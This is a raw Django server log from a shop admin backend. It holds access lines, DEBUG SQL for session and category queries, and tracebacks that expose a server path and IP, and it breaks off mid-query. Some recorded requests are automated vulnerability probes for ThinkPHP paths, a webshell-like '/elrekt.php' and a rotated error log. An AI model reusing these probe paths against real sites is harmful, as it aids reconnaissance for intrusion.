tzinfo=)) [26/Dec/2019 00:57:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 01:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:08:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 01:08:17,829 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jwj2nsyuti9yxzcibkfg0dkofe3dinkm' LIMIT 1; args=('jwj2nsyuti9yxzcibkfg0dkofe3dinkm',) DEBUG 2019-12-26 01:08:17,833 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jwj2nsyuti9yxzcibkfg0dkofe3dinkm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T01:08:17.830623+00:00'::timestamptz); args=('jwj2nsyuti9yxzcibkfg0dkofe3dinkm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 1, 8, 17, 830623, tzinfo=)) [26/Dec/2019 01:08:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 01:08:21] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [26/Dec/2019 01:08:22] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [26/Dec/2019 01:11:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:15:38] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:19:18] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:24:21] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 01:29:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:34:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 01:38:06] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [26/Dec/2019 01:38:08] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=201 HTTP/1.0" 404 6532 Not Found: /newslist.asp [26/Dec/2019 01:38:10] "GET /newslist.asp?type=4&id=1372 HTTP/1.0" 404 6476 [26/Dec/2019 01:39:28] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:44:31] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:49:33] "GET / HTTP/1.0" 302 0 [26/Dec/2019 01:54:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:00:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:13:30] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:18:33] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:23:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:27:42] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:28:39] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:36:43] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [26/Dec/2019 02:39:27] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [26/Dec/2019 02:39:29] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [26/Dec/2019 02:39:29] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [26/Dec/2019 02:39:30] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [26/Dec/2019 02:39:30] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [26/Dec/2019 02:39:31] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [26/Dec/2019 02:39:31] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [26/Dec/2019 02:39:32] "GET /index.php HTTP/1.0" 404 6447 [26/Dec/2019 02:39:32] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:41:49] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:46:52] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:51:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 02:56:51] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:04:24] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [26/Dec/2019 03:09:46] "POST /editBlackAndWhiteList HTTP/1.0" 500 63915 [26/Dec/2019 03:10:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:15:13] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:20:16] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:26:55] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:31:58] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:37:01] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [26/Dec/2019 03:40:18] "POST /editBlackAndWhiteList HTTP/1.0" 500 63911 [26/Dec/2019 03:41:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:41:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 03:41:37,731 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e72be4nnkqtkkau03hxlrxs5jyl2rcql' LIMIT 1; args=('e72be4nnkqtkkau03hxlrxs5jyl2rcql',) DEBUG 2019-12-26 03:41:37,733 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e72be4nnkqtkkau03hxlrxs5jyl2rcql', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T03:41:37.731833+00:00'::timestamptz); args=('e72be4nnkqtkkau03hxlrxs5jyl2rcql', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 3, 41, 37, 731833, tzinfo=)) [26/Dec/2019 03:41:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 03:42:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:47:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:52:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:57:13] "GET / HTTP/1.0" 302 0 [26/Dec/2019 03:58:07] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:02:26] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:09:18] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:14:21] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:15:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:22:22] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:27:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:28:07] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-26 04:28:07,817 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mmc3onvqbs3im5lotgf7ip97yt0d7pm9' LIMIT 1; args=('mmc3onvqbs3im5lotgf7ip97yt0d7pm9',) DEBUG 2019-12-26 04:28:07,819 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mmc3onvqbs3im5lotgf7ip97yt0d7pm9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T04:28:07.818023+00:00'::timestamptz); args=('mmc3onvqbs3im5lotgf7ip97yt0d7pm9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 4, 28, 7, 818023, tzinfo=)) [26/Dec/2019 04:28:07] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 04:28:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 04:28:09,936 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aiktc3xrog0ajxzpyeryh8gffm1xadps' LIMIT 1; args=('aiktc3xrog0ajxzpyeryh8gffm1xadps',) DEBUG 2019-12-26 04:28:09,938 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aiktc3xrog0ajxzpyeryh8gffm1xadps', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T04:28:09.936853+00:00'::timestamptz); args=('aiktc3xrog0ajxzpyeryh8gffm1xadps', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 4, 28, 9, 936853, tzinfo=)) [26/Dec/2019 04:28:09] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 04:32:58] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:35:02] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /robots.txt [26/Dec/2019 04:36:54] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /error.log-20191124.gz [26/Dec/2019 04:36:54] "GET /error.log-20191124.gz HTTP/1.0" 404 6484 [26/Dec/2019 04:42:49] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:47:54] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:54:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 04:59:13] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:05:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:20:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:30:16] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:35:19] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:40:26] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:45:29] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:50:32] "GET / HTTP/1.0" 302 0 [26/Dec/2019 05:55:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 05:56:11,652 utils 4252 140031503103744 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-26 05:56:11,665 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-26 05:56:11,672 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-26 05:56:11,676 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-26 05:56:11,683 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-26 05:56:11,687 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-26 05:56:11,691 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-26 05:56:11,694 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-26 05:56:11,698 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-26 05:56:11,704 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-26 05:56:11,708 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-26 05:56:11,712 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-26 05:56:11,716 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-26 05:56:11,720 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-26 05:56:11,726 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-26 05:56:11,730 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-26 05:56:11,734 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-26 05:56:11,738 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-26 05:56:11,742 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-26 05:56:11,749 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-26 05:56:11,753 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-26 05:56:11,757 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-26 05:56:11,761 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-26 05:56:11,765 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-26 05:56:11,769 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-26 05:56:11,775 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-26 05:56:11,779 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-26 05:56:11,783 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-26 05:56:11,790 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-26 05:56:11,794 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-26 05:56:11,801 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-26 05:56:11,805 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-26 05:56:11,809 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-26 05:56:11,813 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-26 05:56:11,817 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-26 05:56:11,824 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-26 05:56:11,828 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-26 05:56:11,832 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-26 05:56:11,836 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-26 05:56:11,840 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", 